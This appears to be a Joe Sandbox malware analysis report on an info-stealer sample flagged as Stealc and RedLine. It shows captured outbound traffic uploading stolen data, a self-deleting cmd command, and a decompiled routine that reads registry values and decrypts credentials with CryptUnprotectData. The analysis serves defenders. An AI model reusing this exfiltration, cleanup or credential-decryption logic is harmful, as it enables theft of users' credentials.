May 28, 2023 09:29:44.149143934 CEST	1423	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:44.243608952 CEST	1423	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: un78exGoa4.exePID: 7132, Parent PID: 3324

General

Target ID:	0
Start time:	09:29:38
Start date:	28/05/2023
Path:	C:\Users\user\Desktop\un78exGoa4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\un78exGoa4.exe
Imagebase:	0x400000
File size:	297472 bytes
MD5 hash:	84F304E30439CF1F837ED4F31C1FBB28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.421505626.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.421100115.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.421165078.00000000006D9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.421176016.0000000000734000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6808, Parent PID: 7132

General

Target ID:	3
Start time:	09:29:53
Start date:	28/05/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\un78exGoa4.exe" & del "C:\ProgramData\*.dll"" & exit
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6812, Parent PID: 6808

General

Target ID:	4
Start time:	09:29:53
Start date:	28/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 7112, Parent PID: 6808

General

Target ID:	5
Start time:	09:29:54
Start date:	28/05/2023
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 5
Imagebase:	0x60000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: un78exGoa4.exePID: 7132, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	54.8%
Dynamic/Decrypted Code Coverage:	55.8%
Signature Coverage:	26.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 0040C550 Relevance: 118.0, APIs: 78, Instructions: 966
stringregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E0040C550(char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				char _v276;
				char _v288;
				char _v1288;
				char _v2288;
				char _v3288;
				char _v4288;
				char _v5288;
				char _v6288;
				char _v7288;
				char _v8288;
				char _v9288;
				char _v10288;
				char _v11288;
				char _v12288;
				char _v13288;
				char _v14288;
				char _v15288;
				char _v16288;
				char _v17288;
				char _v18288;
				char _v19288;
				char _v20288;
				char _v21288;
				char _v22288;
				char _v23288;
				char _v24288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t397;
				void* _t663;
				void* _t1044;
				void* _t1068;
				void* _t1069;
				void* _t1094;
				void* _t1095;

				E00410280(0x5edc);
				_t397 = RtlAllocateHeap(GetProcessHeap(), 0, 0x98967f); // executed
				_v16 = _t397;
				_v8 =  &_v3288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v16288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v20288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v19288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v2288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v24288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v17288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v15288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v5288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v10288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v22288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v9288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v4288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v11288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v13288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v8288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v1288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v7288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v23288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v14288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v6288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v18288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v21288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v12288;
				memset(_v8, 0, 0x3e8 << 0);
				_t1068 = _t1044 + 0x120;
				 *0x61575c( &_v3288,  *0x615504);
				 *0x61575c( &_v16288,  &_v3288);
				 *0x61575c( &_v20288,  &_v3288);
				 *0x61575c( &_v19288,  &_v3288);
				 *0x61575c( &_v3288,  *0x615310);
				 *0x61575c( &_v16288,  *0x6150e8);
				 *0x61575c( &_v20288,  *0x615068);
				 *0x61575c( &_v19288,  *0x615110);
				 *0x61575c( &_v2288,  *0x615064);
				 *0x61575c( &_v24288,  &_v2288);
				 *0x61575c( &_v17288,  &_v2288);
				 *0x61575c( &_v15288,  &_v2288);
				 *0x61575c( &_v2288,  *0x615310);
				 *0x61575c( &_v24288,  *0x6150e8);
				 *0x61575c( &_v17288,  *0x615068);
				 *0x61575c( &_v15288,  *0x615110);
				 *0x61575c( &_v5288,  *0x615188);
				 *0x61575c( &_v10288,  &_v5288);
				 *0x61575c( &_v22288,  &_v5288);
				 *0x61575c( &_v9288,  &_v5288);
				 *0x61575c( &_v5288,  *0x615310);
				 *0x61575c( &_v10288,  *0x6150e8);
				 *0x61575c( &_v22288,  *0x615068);
				 *0x61575c( &_v9288,  *0x615110);
				 *0x61575c( &_v4288,  *0x6152bc);
				 *0x61575c( &_v11288,  &_v4288);
				 *0x61575c( &_v13288,  &_v4288);
				 *0x61575c( &_v8288,  &_v4288);
				 *0x61575c( &_v4288,  *0x615310);
				 *0x61575c( &_v11288,  *0x6150e8);
				 *0x61575c( &_v13288,  *0x615068);
				 *0x61575c( &_v8288,  *0x615110);
				 *0x61575c( &_v1288,  *0x615154);
				 *0x61575c( &_v7288,  &_v1288);
				 *0x61575c( &_v23288,  &_v1288);
				 *0x61575c( &_v14288,  &_v1288);
				 *0x61575c( &_v1288,  *0x615310);
				 *0x61575c( &_v7288,  *0x6150e8);
				 *0x61575c( &_v23288,  *0x615068);
				 *0x61575c( &_v14288,  *0x615110);
				 *0x61575c( &_v6288,  *0x6154a8);
				 *0x61575c( &_v18288,  &_v6288);
				 *0x61575c( &_v21288,  &_v6288);
				 *0x61575c( &_v12288,  &_v6288);
				 *0x61575c( &_v6288,  *0x615310);
				 *0x61575c( &_v18288,  *0x6150e8);
				 *0x61575c( &_v21288,  *0x615068);
				 *0x61575c( &_v12288,  *0x615110);
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v3288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v16288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v20288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v19288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v2288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v24288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v17288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v15288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v5288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v10288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v22288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v9288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v4288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v11288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v13288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v8288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v1288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12); // executed
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v7288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8); // executed
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v23288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v14288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v6288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v18288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v21288, 0, 0x20019,  &_v12) == 0) {
					E0040C3A0(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				if(RegOpenKeyExA(0x80000001,  &_v12288, 0, 0x20019,  &_v8) == 0) {
					E0040C3A0(_v16,  &_v8);
				}
				_v12 =  &_v276;
				memset(_v12, 0, 0x104 << 0);
				_t1069 = _t1068 + 0xc;
				 *0x61575c( &_v276,  *0x615454);
				 *0x61575c( &_v276,  *0x6150c4);
				_t663 =  *0x61567c(_v16);
				_t1120 = _t663;
				if(_t663 > 0) {
					_push( *0x61567c(_v16));
					_push(_v16);
					_t1094 = _t1069 - 0xc;
					E004100ED(_t1094, _t1120,  &_v276);
					_t1095 = _t1094 - 0x50;
					E004016EB( &_a4, _t1095);
					_push( &_v288); // executed
					E00403F95(0, _t1120); // executed
					_t1069 = _t1095 + 0x68;
					E00401859(_v288);
				}
				_v8 =  &_v3288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v16288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v20288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v19288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v2288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v24288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v17288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v15288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v5288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v10288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v22288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v9288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v4288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v11288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v13288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v8288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v1288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v7288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v23288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v14288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v6288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v18288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v21288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v12288;
				memset(_v8, 0, 0x3e8 << 0);
				return E004016CC( &_a4);
			}

0x0040c558
0x0040c56f
0x0040c575
0x0040c57e
0x0040c58b
0x0040c593
0x0040c5a0
0x0040c5a8
0x0040c5b5
0x0040c5bd
0x0040c5ca
0x0040c5d2
0x0040c5df
0x0040c5e7
0x0040c5f4
0x0040c5fc
0x0040c609
0x0040c611
0x0040c61e
0x0040c626
0x0040c633
0x0040c63b
0x0040c648
0x0040c650
0x0040c65d
0x0040c665
0x0040c672
0x0040c67a
0x0040c687
0x0040c68f
0x0040c69c
0x0040c6a4
0x0040c6b1
0x0040c6b9
0x0040c6c6
0x0040c6ce
0x0040c6db
0x0040c6e3
0x0040c6f0
0x0040c6f8
0x0040c705
0x0040c70d
0x0040c71a
0x0040c722
0x0040c72f
0x0040c737
0x0040c744
0x0040c74c
0x0040c759
0x0040c761
0x0040c76e
0x0040c76e
0x0040c77d
0x0040c791
0x0040c7a5
0x0040c7b9
0x0040c7cc
0x0040c7df
0x0040c7f2
0x0040c805
0x0040c818
0x0040c82c
0x0040c840
0x0040c854
0x0040c867
0x0040c87a
0x0040c88d
0x0040c8a0
0x0040c8b3
0x0040c8c7
0x0040c8db
0x0040c8ef
0x0040c902
0x0040c915
0x0040c928
0x0040c93b
0x0040c94e
0x0040c962
0x0040c976
0x0040c98a
0x0040c99d
0x0040c9b0
0x0040c9c3
0x0040c9d6
0x0040c9e9
0x0040c9fd
0x0040ca11
0x0040ca25
0x0040ca38
0x0040ca4b
0x0040ca5e
0x0040ca71
0x0040ca84
0x0040ca98
0x0040caac
0x0040cac0
0x0040cad3
0x0040cae6
0x0040caf9
0x0040cb0c
0x0040cb2a
0x0040cb35
0x0040cb3e
0x0040cb44
0x0040cb53
0x0040cb5e
0x0040cb67
0x0040cb6d
0x0040cb7c
0x0040cb87
0x0040cb90
0x0040cb96
0x0040cba5
0x0040cbb0
0x0040cbb9
0x0040cbbf
0x0040cbce
0x0040cbd9
0x0040cbe2
0x0040cbe8
0x0040cbf7
0x0040cc02
0x0040cc0b
0x0040cc11
0x0040cc20
0x0040cc2b
0x0040cc34
0x0040cc3a
0x0040cc49
0x0040cc54
0x0040cc5d
0x0040cc63
0x0040cc72
0x0040cc7d
0x0040cc86
0x0040cc8c
0x0040cc9b
0x0040cca6
0x0040ccaf
0x0040ccb5
0x0040ccc4
0x0040cccf
0x0040ccd8
0x0040ccde
0x0040cced
0x0040ccf8
0x0040cd01
0x0040cd07
0x0040cd16
0x0040cd21
0x0040cd2a
0x0040cd30
0x0040cd3f
0x0040cd4a
0x0040cd53
0x0040cd59
0x0040cd68
0x0040cd73
0x0040cd7c
0x0040cd82
0x0040cd91
0x0040cd9c
0x0040cda5
0x0040cdab
0x0040cdba
0x0040cdc5
0x0040cdce
0x0040cdd4
0x0040cde3
0x0040cdee
0x0040cdf7
0x0040cdfd
0x0040ce0c
0x0040ce17
0x0040ce20
0x0040ce26
0x0040ce35
0x0040ce40
0x0040ce49
0x0040ce4f
0x0040ce5e
0x0040ce69
0x0040ce72
0x0040ce78
0x0040ce87
0x0040ce92
0x0040ce9b
0x0040cea1
0x0040ceb0
0x0040cebb
0x0040cec4
0x0040ceca
0x0040ced9
0x0040cee4
0x0040ceed
0x0040cef3
0x0040cefa
0x0040cf07
0x0040cf07
0x0040cf16
0x0040cf29
0x0040cf32
0x0040cf38
0x0040cf3a
0x0040cf45
0x0040cf46
0x0040cf4f
0x0040cf55
0x0040cf5a
0x0040cf62
0x0040cf6d
0x0040cf6e
0x0040cf79
0x0040cf7c
0x0040cf7c
0x0040cf87
0x0040cf94
0x0040cf9c
0x0040cfa9
0x0040cfb1
0x0040cfbe
0x0040cfc6
0x0040cfd3
0x0040cfdb
0x0040cfe8
0x0040cff0
0x0040cffd
0x0040d005
0x0040d012
0x0040d01a
0x0040d027
0x0040d02f
0x0040d03c
0x0040d044
0x0040d051
0x0040d059
0x0040d066
0x0040d06e
0x0040d07b
0x0040d083
0x0040d090
0x0040d098
0x0040d0a5
0x0040d0ad
0x0040d0ba
0x0040d0c2
0x0040d0cf
0x0040d0d7
0x0040d0e4
0x0040d0ec
0x0040d0f9
0x0040d101
0x0040d10e
0x0040d116
0x0040d123
0x0040d12b
0x0040d138
0x0040d140
0x0040d14d
0x0040d155
0x0040d162
0x0040d16a
0x0040d177
0x0040d185

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00000000,?,?,0040D695), ref: 0040C568
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0040C56F
lstrcat.KERNEL32(?), ref: 0040C77D
lstrcat.KERNEL32(?,?), ref: 0040C791
lstrcat.KERNEL32(?,?), ref: 0040C7A5
lstrcat.KERNEL32(?,?), ref: 0040C7B9
lstrcat.KERNEL32(?), ref: 0040C7CC
lstrcat.KERNEL32(?), ref: 0040C7DF
lstrcat.KERNEL32(?), ref: 0040C7F2
lstrcat.KERNEL32(?), ref: 0040C805
lstrcat.KERNEL32(?), ref: 0040C818
lstrcat.KERNEL32(?,?), ref: 0040C82C
lstrcat.KERNEL32(?,?), ref: 0040C840
lstrcat.KERNEL32(?,?), ref: 0040C854
lstrcat.KERNEL32(?), ref: 0040C867
lstrcat.KERNEL32(?), ref: 0040C87A
lstrcat.KERNEL32(?), ref: 0040C88D
lstrcat.KERNEL32(?), ref: 0040C8A0
lstrcat.KERNEL32(?), ref: 0040C8B3
lstrcat.KERNEL32(?,?), ref: 0040C8C7
lstrcat.KERNEL32(?,?), ref: 0040C8DB
lstrcat.KERNEL32(?,?), ref: 0040C8EF
lstrcat.KERNEL32(?), ref: 0040C902
lstrcat.KERNEL32(?), ref: 0040C915
lstrcat.KERNEL32(?), ref: 0040C928
lstrcat.KERNEL32(?), ref: 0040C93B
lstrcat.KERNEL32(?), ref: 0040C94E
lstrcat.KERNEL32(?,?), ref: 0040C962
lstrcat.KERNEL32(?,?), ref: 0040C976
lstrcat.KERNEL32(?,?), ref: 0040C98A
lstrcat.KERNEL32(?), ref: 0040C99D
lstrcat.KERNEL32(?), ref: 0040C9B0
lstrcat.KERNEL32(?), ref: 0040C9C3
lstrcat.KERNEL32(?), ref: 0040C9D6
lstrcat.KERNEL32(?), ref: 0040C9E9
lstrcat.KERNEL32(?,?), ref: 0040C9FD
lstrcat.KERNEL32(?,?), ref: 0040CA11
lstrcat.KERNEL32(?,?), ref: 0040CA25
lstrcat.KERNEL32(?), ref: 0040CA38
lstrcat.KERNEL32(?), ref: 0040CA4B
lstrcat.KERNEL32(?), ref: 0040CA5E
lstrcat.KERNEL32(?), ref: 0040CA71
lstrcat.KERNEL32(?), ref: 0040CA84
lstrcat.KERNEL32(?,?), ref: 0040CA98
lstrcat.KERNEL32(?,?), ref: 0040CAAC
lstrcat.KERNEL32(?,?), ref: 0040CAC0
lstrcat.KERNEL32(?), ref: 0040CAD3
lstrcat.KERNEL32(?), ref: 0040CAE6
lstrcat.KERNEL32(?), ref: 0040CAF9
lstrcat.KERNEL32(?), ref: 0040CB0C
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CB2D
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CB56
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CB7F
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CBA8
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CBD1
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CBFA
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CC4C
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CC75
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CC9E
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CCC7
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CCF0
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CD19
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CD6B
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CD94
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CDBD
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CDE6
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CE0F
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CE38
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CE61
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CE8A
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CEB3
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CEDC
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,0040D695,?,00000000,?,?,0040D695), ref: 0040CD42

Part of subcall function 0040C3A0: wsprintfA.USER32 ref: 0040C4EA
Part of subcall function 0040C3A0: lstrcat.KERNEL32(000000FF,?), ref: 0040C4FD
Part of subcall function 0040C3A0: lstrcat.KERNEL32(000000FF,00414044), ref: 0040C50B
Part of subcall function 0040C3A0: RegEnumValueA.KERNEL32(?,00000000,?,000000FF,00000000,00000003,?,?), ref: 0040C53D

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040D695), ref: 0040CC23

Part of subcall function 0040C3A0: RegEnumValueA.KERNEL32(?,00000000,?,?,00000000,0040D695,?,?,00000000), ref: 0040C3E4
Part of subcall function 0040C3A0: lstrcat.KERNEL32(000000FF,?), ref: 0040C403
Part of subcall function 0040C3A0: lstrcat.KERNEL32(000000FF,004140B4), ref: 0040C411
Part of subcall function 0040C3A0: StrStrA.SHLWAPI(?), ref: 0040C42E
Part of subcall function 0040C3A0: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040C442
Part of subcall function 0040C3A0: RtlAllocateHeap.NTDLL(00000000), ref: 0040C449
Part of subcall function 0040C3A0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040C46D
Part of subcall function 0040C3A0: WideCharToMultiByte.KERNEL32(00000000,00000000,0040D695,?,?,00000400,00000000,00000000), ref: 0040C486
Part of subcall function 0040C3A0: LocalFree.KERNEL32(0040D695), ref: 0040C48F
Part of subcall function 0040C3A0: lstrcpy.KERNEL32(?,00411BE1), ref: 0040C4A4
Part of subcall function 0040C3A0: GetProcessHeap.KERNEL32(00000000,00411BE1), ref: 0040C4AC
Part of subcall function 0040C3A0: HeapFree.KERNEL32(00000000), ref: 0040C4B3
Part of subcall function 0040C3A0: lstrcat.KERNEL32(000000FF,?), ref: 0040C4C3
Part of subcall function 0040C3A0: lstrcpy.KERNEL32(?,00411BE1), ref: 0040C4D5

lstrcat.KERNEL32(?), ref: 0040CF16
lstrcat.KERNEL32(?), ref: 0040CF29
lstrlen.KERNEL32(?,?,00000000,?,?,0040D695), ref: 0040CF32
lstrlen.KERNEL32(?,?,00000000,?,?,0040D695), ref: 0040CF3F

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$Open$Heap$Process$AllocateEnumFreeValuelstrcpylstrlen$ByteCharCryptDataLocalMultiUnprotectWidewsprintf
String ID:
API String ID: 1042928851-0
Opcode ID: 51d922767095c6e5e101d85090512d2f70f24e866dc62d5c0ef36de3b4c8406f
Instruction ID: 17566cb1447bb2a396818255b10b613d9a3a189a151aa770aab9664fd06a6db1
Opcode Fuzzy Hash: 51d922767095c6e5e101d85090512d2f70f24e866dc62d5c0ef36de3b4c8406f
Instruction Fuzzy Hash: BF82E77681055DEFDF51CBA0DD849DEBBBDEB88300F2485A7A606E3250EB34AB449F50

Uniqueness

Uniqueness Score: -1.00%

Function 00409C83 Relevance: 72.6, APIs: 38, Strings: 3, Instructions: 895
memoryregistrytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00409C83(signed int __ecx, void* __eflags, char _a4) {
				char _v16;
				struct _SYSTEM_POWER_STATUS _v28;
				char _v40;
				void* _v44;
				char _v56;
				int _v60;
				struct _SYSTEMTIME _v76;
				char _v88;
				intOrPtr _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
